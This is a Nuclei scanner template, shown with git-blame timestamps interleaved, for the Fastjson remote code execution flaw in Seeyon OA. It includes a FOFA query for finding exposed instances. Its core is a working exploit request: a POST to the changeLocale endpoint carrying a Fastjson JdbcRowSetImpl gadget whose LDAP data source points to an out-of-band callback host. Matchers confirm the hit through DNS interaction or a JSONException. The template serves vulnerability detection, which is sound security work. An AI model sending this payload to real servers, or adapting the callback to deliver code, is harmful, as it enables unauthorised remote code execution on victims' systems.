2023-08-18 03:22:06 +00:00
|
|
|
id: seeyon-oa-fastjson-rce
|
|
|
|
|
|
|
|
info:
|
2023-09-05 12:25:45 +00:00
|
|
|
name: Seeyon OA Fastjson Remote Code Execution
|
2023-08-18 03:22:06 +00:00
|
|
|
author: SleepingBag945
|
|
|
|
severity: critical
|
|
|
|
reference:
|
|
|
|
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
|
2023-09-05 12:25:45 +00:00
|
|
|
- https://github.com/hktalent/scan4all/blob/main/pocs_go/seeyon/SeeyonFastjson.go
|
|
|
|
metadata:
|
|
|
|
max-request: 1
|
|
|
|
fofa-query: app="致远互联-OA"
|
|
|
|
verified: true
|
|
|
|
tags: seeyon,oa,rce,fastjson,oast
|
2023-08-18 03:22:06 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /seeyon/main.do?method=changeLocale HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "dns"
|
|
|
|
|
2023-09-05 12:25:45 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "com.alibaba.fastjson.JSONException"
|